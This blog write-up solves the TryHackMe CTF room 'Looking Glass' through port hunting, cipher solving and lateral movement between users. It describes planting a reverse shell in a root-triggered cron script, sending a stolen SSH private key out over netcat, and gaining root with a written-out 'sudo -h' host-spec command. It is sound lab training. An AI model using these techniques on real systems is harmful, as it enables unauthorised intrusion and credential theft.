Introduction

Looking Glass is rated as medium difficulty CTF-Style machine created by NinjaJc01 and it is the sister room to "Wonderland" which can also be found on TryHackMe (a writeup for that room can also be found on this blog.)
Much like Alice in the worlds' of Lewis Carroll, the pentester who strives to learn about their environment will have the most productive journey Through the Looking Glass!

Challenge link can be found here:: tryhackme.com/room/lookingglass
NOTE:The challenge link for the previous room Wonderland can be found here:: tryhackme.com/room/wonderland

Enumeration

My initial nmap scan showed 84 open ports, most of them running Dropbear SSH service. At the same time i had an allports scan that would never fully finish.. Point is there's a lot of open ports to start with here.

I did also see an openSSH service on the default port 22 but everything else appeared to be a clone of this Dropbear SSH server.

001.png

After a while I started trying to connect to those open ports with ssh while specifying a port with -p Most of them would reply with one string. Either “Higher” or “Lower” and then promptly disconnect.
After trying out the extremes of the port range I figured it was trying to tell me that my selected port was either too high or too low.

So recalling my analog electronics troubleshooting methodology, we divide and conquer! Meaning whatever the range is, cut it in half and see if you can narrow down where your problem or in this case solution is.
I had thought about scripting this out for the extra practice but I quickly narrow it down to just a few ports within a minute or so.

002.png

NOTE: You can try searching the range above on your own but it likely won't work. The active port changes with each reboot.

Anywhoo, after you've found the active port we get a nice cipher message from the Jabberwocky asking us for a secret.

003.png

Initial Compromise

It seemed like it might be a ROT13 or Caesar cipher but trying as many combinations as possible with cyber chef didn't yield any results. I tried googling for The Jabberwocky hoping for some kind of clue and I did find a cleartext version of the Jabberwocky poem. Interestingly enough the ciphertext and cleartext match up along word count and punctuation, but the ciphertext appears to have an extra line at the end. So it seemed like I was trying to decrypt it back into the cleartext poem with an extra line added on.

The next place I took this was dcode.fr which has an excellent cipher identifier. The top two suggestions were a Chaocipher and a Vigenere Cipher. The Chaocipher seemed like a dead end and i didn't have a key for the Vigenere Cipher(I tried alice, jabberwock, lewis, carroll, words from the poem, etc..) so no luck there.

So I did some googling for ‘how to solve vigenere cipher without key’ which led me to the following site with a wicked fast return rate. planetcalc.com/7956

We're able to extract the secret and when we enter it into the active Dropbear port we get what looks like credentials for a user named jabberwock.

004.png

Lateral Movement

Now that we're logged in as the user jabberwock I start the usual enumerations. We see that jabberwock is able to reboot the machine as root..

005.png

Additionally, after uploading the linux-smart-enumeration script we see a cronjob, triggered by reboot, and owned by tweedledum that runs a script located in jabberwock's home directory.

006.png

Since it's just a bash script we can echo in a reverse bash shell, start a listener on our ATK machine, and then reboot the machine to catch a shell as tweedledum

007.png

Cool, now we're in as tweedledum. More enumeration ensues with the aid of linux-smart-enumeration script (lse as a shortname)

008.png

Interestingly enough tweedledum is able to run /bin/bash as tweedledee without supplying a password. Seems like a lateral movement but lets try it out and see if we find anything new.
NOTE: The -u switch is used to indicate that you want to run a sudo command as another user.
sudo -u tweedledee /bin/bash
sudo -u <username> <command>

009.png

After making the user switch we see that tweedledee and tweedledum have the same sudo capabilities to switch between each other and they have almost exactly the same files in their home directories (makes sense considering they were identical twins in the storybook.) Anyhow speaking of files, the humptydumpty.txt file in each of their directories looks like it has a list of hashes in it.

010.png

011.png

Before going all in I try plugging them into crackstation to see if we get any quick hits. Looks like a pretty good clue...

012.png

I tried cracking with hashcat but went through the entirety of rockyou without finding anything fruitful.

013.png

Next stop was the cipher-identifier at dcode.fr just to give me an idea of what else this could be.
dcode.fr/cipher-identifier
Top suggestion was ASCII code and after entering the hash into the calculator for ASCII it flagged it as hex and spit out a password for me.

014.png

We can now switch users to humptydumpty thanks to this password. In humptydumpty's home directory we find another poem. No clues for escalation but it does advance the story somewhat.

015.png

I run the lse script again and notice something interesting for the alice user.. Running /bin/bash as root sounds wonderful...now how do we become alice?

016.png

Privilege Escalation

Checking out the /home directory I notice that alice has execute permissions set for AllUsers. No read/write but we can execute in there.
We can also change directories into /home/alice. Because of this i take a chance at enumerating the /home/alice/.ssh directory and find myself rewarded with a private ssh-key by looking for the default path/filename.
In this case we set a netcat listener on our ATK machine, then direct the id_rsa file into a netcat connection pointed at our ATK listener.

017.png

After this we should be able to ssh in as alice using the exfiltrated private key. Whoops! forgot to set permissions on the private key (renamed to ‘alice’)
chmod 400 alice
or if you kept the default name..
chmod 400 id_rsa

018.png

Once we're in as alice i see another poem in the user's home directory but it doesn't seem too useful so it's time to take a look at that interesting sudo entry for alice again.

019.png

We can't read /etc/sudoers directly but we can access the directory that stores settings for several of the users on this machine.
This entry is basically saying “The user Alice on the host ssalg-gnikool can run /bin/bash as root without a password”
<USER> <HOST> = <Runas_Spec> <Tag_Spec>: <Command>

NOTE::This link is a bit dense but thorough:: sudo.ws/man/1.7.10/sudoers.man.html

020.png

With the following command we're basically saying, “Alice would like to run /bin/bash as root on the host ssalg-gnikool”
sudo -h ssalg-gnikool /bin/bash
Due to the way sudo operates it fails to resolve the host ssalg-gnikool (looking-glass) however it does still run /bin/bash as root for us.

021.png

That's it! After we've got root we can loot the remaining flag and even check out the scripts and programs that were randomizing our jabberwock passwords after each reboot and what was changing up the active DropBear port on us (sneaky, sneaky...and very nice!)

Conclusion

This was a really fun box to get lost in for a little while! Most of the lateral movements came down to exploring what each user had available to them in terms of capabilities or resources, and the final escalation to root was pretty nifty too! We don't often see sudo rights to remote hosts in these CTF-style boxes and I had never seen this one before so it was a nice curveball and a good reminder of the real world scenarios that we should all be aware of.

Logo
Linux

更多推荐

cover

Catf1ag CTF Web(三)

avatar Linux
cover

Linux入门:Linux权限解析

avatar Linux
cover

Linux--网络层IP

avatar Linux